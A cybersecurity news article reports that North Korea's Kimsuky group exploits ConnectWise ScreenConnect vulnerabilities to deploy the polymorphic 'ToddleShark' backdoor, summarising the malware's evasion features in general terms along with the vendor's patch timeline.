North Korea Hits ScreenConnect Bugs to Drop 'ToddleShark' Malware

We Keep you Connected

North Korea Hits ScreenConnect Bugs to Drop 'ToddleShark' Malware

North Korea’s latest espionage tool is tough to pin down, with random generators that throw detection mechanisms off its scent. The DPRK is using the recent critical bugs in ConnectWise ScreenConnect, a remote desktop tool, to deliver the bug.
March 5, 2024
North Korean hackers are using a critical vulnerability in ConnectWise's ScreenConnect software to spread new, shapeshifting espionage malware.
Two weeks ago, ConnectWise revealed two flaws in its popular remote desktop application: CVE-2024-1708, a path traversal bug given a "high" score of 8.4 out of 10 on the CVSS scale, and CVE-2024-1709, a rare "critical" 10 out of 10 authentication bypass bug. With hardly a moment to spare, cyberattackers pounced — most notably, initial access brokers (IABs) in cahoots with ransomware groups — with thousands of organizations in the firing line scrambling to patch.
Kimsuky (aka APT43), the advanced persistent threat (APT) from the Democratic People's Republic of Korea (DPRK), is getting in on the action, too. According to a new blog post from Kroll, it's exploiting vulnerable versions of ScreenConnect to deploy a new backdoor called "ToddleShark."
"The list of threat actors utilizing the ScreenConnect vulnerability CVE-2024-1709 for initial access is growing," according to Kroll. "Patching ScreenConnect applications is therefore imperative."
ToddleShark builds off of previous Kimsuky malware but stands out for its approach to anti-detection.
In recent espionage campaigns, Kimsuky has deployed various custom backdoors, including ReconShark and BabyShark, against government organizations, research centers, think tanks, and universities in North America, Europe, and Asia.
ToddleShark, the weapon of choice this time around, is notably similar to BabyShark, but it has certain important advancements.
Among other functions, ToddleShark gathers system information, including configuration details, what security software is installed on the device, and lists of user sessions, network connections, running processes, and more.
It then sends that information back to attacker-controlled command-and-control (C2) servers via cryptographically protected Privacy-Enhanced Mail (PEM) certificates.
"The malware being deployed in this case uses execution through a legitimate Microsoft binary, MSHTA, and exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code and using uniquely generated C2 URLs, which could make this malware hard to detect in some environments," Kroll researchers said in their post, released today.
ToddleShark stands out most, though, for how it uses random generation algorithms to dodge detection. For example, it uses random names for variables and functions to stump static detection, and randomizes its strings and the ordering of code to confuse standard signature-based detection.
Interspersed with its regular malicious code are large chunks of junk code, and hexadecimal encoded code, making the final outcome look like a bit of a mess.
Blocklisting doesn't really work against ToddleShark, either, because the hash of the initial payload and URLs used to download additional stages of the malware are always different.
The fact that detecting this backdoor is so tricky only emphasizes the need for organizations to update, if they haven't already. A patch and other resources for ConnectWise customers are available on the vendor's website.

A ConnectWise spokesperson laid out the timeline:

"On February 13th, an independent researcher submitted a potential ScreenConnect vulnerability through our voluntary disclosure process," the person says. "Once validated, ConnectWise mitigated all cloud instances of ScreenConnect within 48 hours. On February 19th, we released a patch for all on-prem ScreenConnect customers, posted a security bulletin on the ConnectWise Trust Center, and sent patching instructions to ScreenConnect customers."
ConnectWise noted that customers should immediately patch on-prem instances of ScreenConnect.
"At this time, ConnectWise and other cybersecurity firms have seen exploits of the ScreenConnect vulnerability on unpatched on-prem instances," the spokesperson says. "However, cyberattacks can occur through numerous avenues, including vulnerabilities, phishing, and business email compromise. While usually used for IT service delivery and product support, attackers can misuse remote control tools to facilitate malicious activities."

Nate Nelson, Contributing Writer

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" — an award-winning Top 20 tech podcast on Apple and Spotify — and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.
You May Also Like
Assessing Your Critical Applications’ Cyber Defenses
Unleash the Power of Gen AI for Application Development, Securely
The Anatomy of a Ransomware Attack, Revealed
How To Optimize and Accelerate Cybersecurity Initiatives for Your Business
Building a Modern Endpoint Strategy for 2024 and Beyond
Cybersecurity’s Hottest New Technologies – Dark Reading March 21 Event
Black Hat Asia – April 16-19 – Learn More
Black Hat Spring Trainings – March 12-15 – Learn More
Industrial Networks in the Age of Digitalization
Zero-Trust Adoption Driven by Data Protection
How Enterprises Assess Their Cyber-Risk
Enterprise Cybersecurity Plans in a Post-Pandemic World
SANS 2021 Cloud Security Survey
A Solution Guide to Operational Technology Cybersecurity
Demystifying Zero Trust in OT
Strengthen Microsoft Defender with MDR
Mandiant Threat Intelligence at Penn State Health
Migrations Playbook for Saving Money with Snyk + AWS
Cybersecurity’s Hottest New Technologies – Dark Reading March 21 Event
Black Hat Asia – April 16-19 – Learn More
Black Hat Spring Trainings – March 12-15 – Learn More
Copyright © 2024 Informa PLC Informa UK Limited is a company registered in England and Wales with company number 1072954 whose registered office is 5 Howick Place, London, SW1P 1WG.